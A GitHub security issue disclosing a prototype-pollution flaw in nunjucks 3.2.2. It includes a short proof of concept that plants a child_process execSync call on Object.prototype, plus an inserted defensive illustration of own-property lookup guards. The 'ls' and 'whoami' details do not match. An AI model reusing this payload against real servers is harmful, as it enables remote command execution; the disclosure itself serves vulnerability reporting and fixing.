
Security bug about prototype pollution #1331

Comments

@ChenKS12138
Contributor

This is a security bug. The current version of nunjucks can be attacked by prototype pollution.
What I expected is `this is payload2 content is function(){ return global.process.mainModule.require('child_process').execSync('ls') }()`, but the function returns `this is payload2 content is main.js node_modules package.json yarn.lock`.

Closes #1330.

Environment

macOS 10.15.7
Node.js 12.18.1
nunjucks 3.2.2

The sample code is as follows.

```javascript
const nunjucks = require("nunjucks");

nunjucks.configure({
  autoescape: true,
});

// The template only references a variable named `content`.
const template = nunjucks.compile(" content is {{ content }} ");

// Empty context object: it has no own `content` property.
const payload = { };

// Writing through __proto__ puts `content` on Object.prototype,
// so every plain object now inherits it.
payload.__proto__.content =
  " function(){ return global.process.mainModule.require('child_process').execSync('whoami') }() ";

console.log("this is payload2 ", template.render(payload));
```

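As an added, defender-side illustration (not nunjucks's own code and not part of the issue), the snippet below shows why a variable lookup that reads `vars[name]` without an own-property check picks up a key written onto `Object.prototype`, and the two guards that stop it; the function names and the `"polluted"` marker are constructed for this example.

```javascript
// Constructed illustration of the lookup pattern behind prototype pollution.
// None of this is nunjucks code; the names are invented for the example.

// Unsafe lookup: a plain `obj[name]` read also finds inherited keys.
function unsafeLookup(vars, name) {
  return vars[name];
}

// Hardened lookup: only own properties count; inherited keys are ignored.
function safeLookup(vars, name) {
  return Object.prototype.hasOwnProperty.call(vars, name) ? vars[name] : undefined;
}

// Hardened storage: a null-prototype object has no chain to walk at all.
function makeVars() {
  return Object.create(null);
}

// Detection helper: keys an object reaches only through its prototype chain,
// i.e. candidates for pollution that an audit should flag.
function inheritedKeys(obj) {
  const out = [];
  for (const k in obj) {
    if (!Object.prototype.hasOwnProperty.call(obj, k)) out.push(k);
  }
  return out;
}

// Runs every lookup against an empty variable table while Object.prototype
// carries a harmless, constructed marker under the key the issue uses.
function demo() {
  Object.prototype.content = "polluted"; // constructed pollution for the demo
  try {
    const plain = {};
    return {
      unsafe: unsafeLookup(plain, "content"),            // "polluted"
      guarded: safeLookup(plain, "content"),             // undefined
      nullProto: unsafeLookup(makeVars(), "content"),    // undefined
      ownWins: safeLookup({ content: "ok" }, "content"), // "ok"
      leaked: inheritedKeys(plain),                      // ["content"]
    };
  } finally {
    delete Object.prototype.content; // always restore the global state
  }
}
```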

striezel added a commit to striezel-stash/rustsec-audit-check that referenced this issue Mar 13, 2023
Fixes a prototype pollution in nunjucks. See
<mozilla/nunjucks#1331> for more
information.